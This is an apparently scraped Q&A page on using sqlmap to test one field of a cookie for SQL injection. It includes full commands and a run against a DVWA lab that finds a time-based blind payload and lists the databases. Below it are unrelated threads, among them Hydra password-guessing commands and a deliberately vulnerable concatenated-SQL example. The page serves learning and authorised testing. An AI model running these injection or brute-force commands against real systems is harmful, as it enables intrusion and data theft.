How to inject a part of cookie using sqlmap - sqlmap

I need to do SQL injection on a part of a cookie using sqlmap. The target URL is static.
A sample cookie:
Cookie1=blah_var1/blah_val1/blah_var2/blah_val2/searchtext/userinput/blah_var3/blah_val3/.../
In this cookie I need to inject the "userinput" using sqlmap. I know the --cookie parameter but it won't work in this case. It's like only a part of the cookie has to be injected using sqlmap.
I don't know how to do this. Please help.

I got the same problem injecting SQL in a cookie. I looked at its help and its code, and now finally something made some sense, so let me put my hypothesis:
1. Cookie-based injection works only with level>=2.
2. You need to specify param-filter='COOKIE'.
3. Do not let sqlmap try URI injections when it asks for them, or else it will fail by doing GET/POST based testing.
4. If you specify a custom injection marker on that testable cookie, do not proceed with that, or else it will fail.
I didn't try many combinations for the 3rd and 4th points, so feel free to invalidate them. Okay so, try something like this:
sqlmap -u 'protocol://test.server/test_url/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
The options necessary for cookie-based testing are: -u, --cookie, -p, --param-filter, --level.
Command tried on sqlmap version: 1.4.8#stable
Output:
$ sqlmap -u 'http://dvwa.local/vulnerabilities/sqli_blind/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
___
__H__
___ ___[']_____ ___ ___ {1.4.8#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting # 01:18:36 /2020-08-31/
[01:18:36] [WARNING] using '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir' as the output directory
[01:18:36] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site_com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] n
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
[01:18:39] [INFO] testing connection to the target URL
[01:18:40] [INFO] testing if the target URL content is stable
[01:18:43] [INFO] target URL content is stable
do you want to URL encode cookie values (implementation specific)? [Y/n] y
[01:19:01] [WARNING] heuristic (basic) test shows that Cookie parameter 'id' might not be injectable
[01:19:02] [INFO] testing for SQL injection on Cookie parameter 'id'
[01:19:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:19:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[01:19:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[01:19:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[01:19:17] [INFO] testing 'Generic inline queries'
[01:19:17] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[01:19:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[01:19:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:19:31] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:32] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:19:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:19:47] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[01:19:50] [INFO] testing 'MySQL inline queries'
[01:19:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:19:52] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[01:19:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:20:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[01:20:33] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[01:21:28] [INFO] Cookie parameter 'id' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n] n
[01:23:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:23:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:23:47] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[01:24:08] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1')
[01:24:08] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[01:24:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[01:24:27] [INFO] testing 'MySQL UNION query (65) - 21 to 40 columns'
[01:24:36] [INFO] checking if the injection point on Cookie parameter 'id' is a false positive
Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 262 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: id=*' RLIKE SLEEP(5) AND 'EZrr'='EZrr; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high
---
[01:50:27] [INFO] the back-end DBMS is MySQL
[01:50:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:50:52] [INFO] fetching database names
[01:50:52] [INFO] fetching number of databases
[01:50:52] [INFO] retrieved: 2
[01:51:42] [INFO] retrieved: information_schema
[02:16:58] [INFO] retrieved: dvwa
available databases [2]:
[*] dvwa
[*] information_schema
[02:22:32] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 414 times
[02:22:32] [INFO] fetched data logged to text files under '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir/dvwa.local'
[*] ending # 02:22:32 /2020-08-31/

Intercept the request, save it to a file and then give that file to sqlmap with the -r parameter; by default sqlmap should check the cookie.
sqlmap.py -r request.txt
You can use Tamper Data (Firefox extension), or the free version of Burp proxy, to intercept the request.

Try something like this:
sqlmap.py -u localhost/vulnerable --cookie="STATE_COOKIE=%2F1%2F_VMD%2F1%26_REQS%2F_RVID%2FCriteriaResourceFilter%2F_TIME%2F1403689244638%2F_ORVID%2FPassTrixMain%2FSEARCH_COLUMN%2FRESOURCENAME%2FSEARCH_VALUE%2Fsearchtext*"

This will test the parameter auth in the cookie:
sqlmap -u "website" --cookie='auth=blabla; uuid=blabla' -p auth --level=2
Level must be at least 2. This isn't the only way to specify the parameter to test; you can also use * to mark the injection point.
sqlmap -u "website" --cookie='auth=blabla; uuid=*' --level=2
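As an added example, not from the question or any answer here: a Python sketch of the server side that a cookie like the one in the question implies, with a parser for the slash-delimited format and the search query written once by string concatenation (the pattern the time-based payload in the output above exploits) and once with a bound parameter. The table, field and function names are constructed.

```python
import sqlite3
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample in the question's format: k1/v1/k2/v2/.../ (hypothetical names).
SAMPLE_COOKIE = "blah_var1/blah_val1/searchtext/userinput/blah_var3/blah_val3/"


def parse_path_cookie(value: str) -> Dict[str, str]:
    """Split a 'k1/v1/k2/v2/.../' cookie value into a dict.

    Separators are literal slashes as in the question; each field is
    percent-decoded afterwards (sqlmap's 'URL encode cookie values' prompt
    exists because some apps encode the fields). A dangling key maps to ''.
    """
    stripped = value.rstrip("/")
    if not stripped:
        return {}
    parts = [unquote(p) for p in stripped.split("/")]
    fields: Dict[str, str] = {}
    for i in range(0, len(parts), 2):
        fields[parts[i]] = parts[i + 1] if i + 1 < len(parts) else ""
    return fields


def make_db() -> sqlite3.Connection:
    """Constructed in-memory product table standing in for the search back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?)",
                     [("globe",), ("map",), ("compass",)])
    return conn


def search_vulnerable(conn: sqlite3.Connection, cookie: str) -> List[str]:
    """Concatenates the 'searchtext' field into the SQL text.

    This is the shape of code the question's test would hit: the cookie
    field becomes part of the statement, so a quote inside it closes the
    string literal and whatever follows is parsed as SQL.
    """
    term = parse_path_cookie(cookie).get("searchtext", "")
    sql = f"SELECT name FROM products WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, cookie: str) -> List[str]:
    """Binds the field as a parameter; the statement text is fixed at build time."""
    term = parse_path_cookie(cookie).get("searchtext", "")
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]


if __name__ == "__main__":
    db = make_db()
    print(parse_path_cookie(SAMPLE_COOKIE))
    benign = "blah_var1/blah_val1/searchtext/map/"
    print(search_vulnerable(db, benign), search_safe(db, benign))
```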

Related

Sqlmap tips have injectable but unable to inject

[21:07:29] [INFO] (custom) POST parameter 'JSON phone' appears to be 'MySQL AND time-based blind (ELT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
It tips that it is time-based blind injectable, but when I use the "time-based blind" pattern it cannot find it injectable.
I use the command: "sqlmap -r /Users/yangzhuo/Downloads/sql1.txt --level=5 --risk=3 -vvv -random-agent --technique T -batch -dbs"

How to connect to local gremlin server using python

I have a local gremlin server running:
bin/gremlin.sh
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.codehaus.groovy.vmplugin.v7.Java7$1 (file:/Users/jwan/Downloads/apache-tinkerpop-gremlin-console-3.4.4/lib/groovy-2.5.7-indy.jar) to constructor java.lang.invoke.MethodHandles$Lookup(java.lang.Class,int)
WARNING: Please consider reporting this to the maintainers of org.codehaus.groovy.vmplugin.v7.Java7$1
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
\,,,/
(o o)
-----oOOo-(3)-oOOo-----
plugin activated: tinkerpop.server
plugin activated: tinkerpop.utilities
plugin activated: tinkerpop.tinkergraph
I'm also trying to connect to it using Python:
from gremlin_python.structure.graph import Graph
from gremlin_python.process.anonymous_traversal import traversal
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection
from os import environ
graph = Graph()
graph_db = traversal().withGraph(graph).withRemote(DriverRemoteConnection(f'ws://localhost:3000/gremlin','g'))
I get a connection refused error. How do I connect to this locally?
That console session shows output from Gremlin Console, not Gremlin Server. They are two totally different distributions. Download the Gremlin Server distribution here and start it with bin/gremlin-server.sh. Your output should look like this after it has started:
[INFO] GremlinServer
\,,,/
(o o)
-----oOOo-(3)-oOOo-----
[INFO] GremlinServer - Configuring Gremlin Server from conf/gremlin-server-modern.yaml
[INFO] MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics
[INFO] DefaultGraphManager - Graph [graph] was successfully configured via [conf/tinkergraph-empty.properties].
[INFO] ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*
[INFO] ServerGremlinExecutor - Initialized GremlinExecutor and preparing GremlinScriptEngines instances.
[INFO] ServerGremlinExecutor - Initialized gremlin-groovy GremlinScriptEngine and registered metrics
[INFO] ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[tinkergraph[vertices:0 edges:0], standard]
[INFO] OpLoader - Adding the standard OpProcessor.
[INFO] OpLoader - Adding the session OpProcessor.
[INFO] OpLoader - Adding the traversal OpProcessor.
[INFO] TraversalOpProcessor - Initialized cache for TraversalOpProcessor with size 1000 and expiration time of 600000 ms
[INFO] GremlinServer - Executing start up LifeCycleHook
[INFO] Logger$info - Loading 'modern' graph data.
[INFO] GremlinServer - idleConnectionTimeout was set to 0 which resolves to 0 seconds when configuring this value - this feature will be disabled
[INFO] GremlinServer - keepAliveInterval was set to 0 which resolves to 0 seconds when configuring this value - this feature will be disabled
[WARN] AbstractChannelizer - The org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0 serialization class is deprecated.
[INFO] AbstractChannelizer - Configured application/vnd.gremlin-v3.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0
[WARN] AbstractChannelizer - The org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0 serialization class is deprecated.
[INFO] AbstractChannelizer - Configured application/vnd.gremlin-v3.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0
[INFO] AbstractChannelizer - Configured application/vnd.gremlin-v3.0+json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0
[INFO] AbstractChannelizer - Configured application/json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0
[INFO] AbstractChannelizer - Configured application/vnd.graphbinary-v1.0 with org.apache.tinkerpop.gremlin.driver.ser.GraphBinaryMessageSerializerV1
[INFO] AbstractChannelizer - Configured application/vnd.graphbinary-v1.0-stringd with org.apache.tinkerpop.gremlin.driver.ser.GraphBinaryMessageSerializerV1
[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 4 and boss thread pool of 1.
[INFO] GremlinServer$1 - Channel started at port 8182.

Using SaltStack's State Modules to Accept Newly Added Repo's Package Signing Key

Problem
On a standalone minion, salt.states.pkgrepo.managed is being used to add a non-standard software repo. The problem that's occurring is that when a following sudo zypper update runs, the key has not been (auto) accepted by the system, preventing any packages from being updated or installed, and thus the next state fails.
To reiterate, with the exact state used (mysuse.sls):
suse-gis-repo:
  pkgrepo.managed:
    - name: Application_Geo
    - humanname: Applications related to the earth (GIS, Mapping, geodesy, GPS, astronomy) (openSUSE_Leap_42.1)
    - baseurl: http://download.opensuse.org/repositories/Application:/Geo/openSUSE_Leap_42.1/
    - gpgcheck: 1
    - gpgkey: http://download.opensuse.org/repositories/Application:/Geo/openSUSE_Leap_42.1//repodata/repomd.xml.key
The problem is when the next phase of the state runs:
packages_uptodate:
  pkg.uptodate:
    - refresh: True
It fails because of required manual intervention shown below:
New repository or package signing key received:
Repository: Application_Geo
Key Name: Application:Geo OBS Project <Application:Geo@build.opensuse.org>
Key Fingerprint: 195E2111 06BC205D 2A9C2222 CC7F0748 9591C39B
Key Created: Thu 16 Jul 2015 08:01:27 PM CEST
Key Expires: Sat 23 Sep 2017 08:01:27 PM CEST
Rpm Name: gpg-pubkey-9591c39b-55a7f177
Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r):
Attempts to Solve
1. Even if the last two lines of suse-gis-repo are commented out (i.e. gpgcheck & gpgkey), the problem described above still occurs.
2. zypper ar -G <URI> ensures the gpgkey is not checked, but there is no option for this in the salt state.
3. As one attempt to solve this problem, instead of using salt.states.pkgrepo.managed, the corresponding execution module zypper.mod_repo was tried.
The example described in #3 is below:
package_autoaccept_key:
  module.run:
    - name: zypper.mod_repo
    - kwargs: {
        repo: 'Application_Geo',
        baseurl: 'http://download.opensuse.org/repositories/Application:/Geo/openSUSE_Leap_42.1/',
        enabled: 'True',
        refresh: 'True',
        gpgcheck: 'True',
        gpgautoimport: 'True'
      }
With the error:
local:
----------
ID: package_autoaccept_key
Function: module.run
Name: zypper.mod_repo
Result: False
Comment: Module function zypper.mod_repo is not available
Started: 02:18:34.108787
Duration: 543.087 ms
Changes:
Summary for local
------------
Succeeded: 0
Failed: 1
------------
Questions
1. Is there a way to accept the key (always trust) autonomously, either via state or execution modules?
2. Are execution modules able to run on standalone minions via the module.run function?
3. If they are able to run on standalone minions, what is the best way to be sure the required module is present?
4. Is the approach of using module.run in a state a flawed approach to the said problem and if so, why?

SaltStack and GitFS - No Top file or external nodes data matches found

Here is my /etc/salt/master config:
#GitFS
gitfs_provider: pygit2
gitfs_base: DEVELOPMENT
gitfs_env_whitelist:
  - base
fileserver_backend:
  - git
gitfs_remotes:
  - ssh://git@github.com/myrepo/salt-states.git:
    - pubkey: /root/.ssh/my.pub
    - privkey: /root/.ssh/my
    - mountpoint: salt:///srv/salt/salt-states
Here is my directory structure for the repo:
.
|-- README.md
|-- formulas
|   `-- test
|       |-- test.sls
`-- top.sls
Here is my very basic top.sls:
base:
  '*':
    - test
If I try to run highstate on my test node I get:
root@saltmaster:/etc/salt] salt -v '*' state.highstate
Executing job with jid 1234567890
-------------------------------------------
test-minion.domain:
----------
ID: states
Function: no.None
Result: False
Comment: No Top file or external nodes data matches found.
Started:
Duration:
Changes:
Summary for test-minion.domain
------------
Succeeded: 0
Failed: 1
------------
Total states run: 1
Total run time: 0.000 ms
I'm not sure why this isn't working and would appreciate any help with this. I've tried just applying the test.sls to see if it was the top file that was the issue but I got this:
root@saltmaster:/etc/salt] salt -v '*' state.sls test
Executing job with jid 1234567890
-------------------------------------------
test-minion.domain:
Data failed to compile:
----------
No matching sls found for 'test' in env 'base'
I had a similar problem, which was due to the cache being out of sync and not updating. If I tried to run:
salt-run fileserver.update
I got:
[WARNING ] Update lock file is present for gitfs remote 'git@github.com:mention-me/Salt.git', skipping. If this warning persists, it is possible that the update process was interrupted, but the lock could also have been manually set. Removing /var/cache/salt/master/gitfs/7d8d9790a933949777fd5a58284b8850/.git/update.lk or running 'salt-run cache.clear_git_lock gitfs type=update' will allow updates to continue for this remote.
Deleting the cache file specified, and running the above command fixed the problem.
I talked to the folks on the saltstack IRC and someone helped me fix the problem. It seems that adding a mountpoint was screwing everything up. Credit goes to:
[12:20] == realname : Thomas Phipps
[12:20] == channels : #salt
[12:20] == server : orwell.freenode.net [NL]
[12:20] == : is using a secure connection
[12:20] == account : whytewolf
[12:20] == End of WHOIS

Why does this simple Hydra command not work?

I'm trying to get the hang of hydra.
When I do this to test against my ftp site, it works. I'm hitting my own ftp site (ex. www.mysite.com) with the correct username and password (ex. username1 and password1):
./hydra -l username1 -p password1 -vV -f www.mysite.com ftp
Hydra v7.4.1 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-12-29 21:06:20
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target www.mysite.com - login "username1" - pass "password1" - 1 of 1 [child 0]
[21][ftp] host: 200.200.240.240 login: username1 password: password1
[STATUS] attack finished for www.mysite.com (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-12-29 21:06:21
However, when I do this to test a public basic authentication test page (http://browserspy.dk/password-ok.php) with the correct username and password (test and test), hydra just stops with a 'Resolving address ... done' message.
./hydra -l test -p test -vV -f browserspy.dk http-get /password-ok.php
Hydra v7.4.1 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-12-29 21:02:58
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service http-get on port 80
[VERBOSE] Resolving addresses ... done
The hydra process just seems to die here and I'm returned to the command prompt.
What am I doing wrong?
You are not doing anything wrong; it's a bug in Hydra which affects the modes http-get, http-head and irc. Downgrade to v7.3 or wait for v7.5, which will fix this issue.
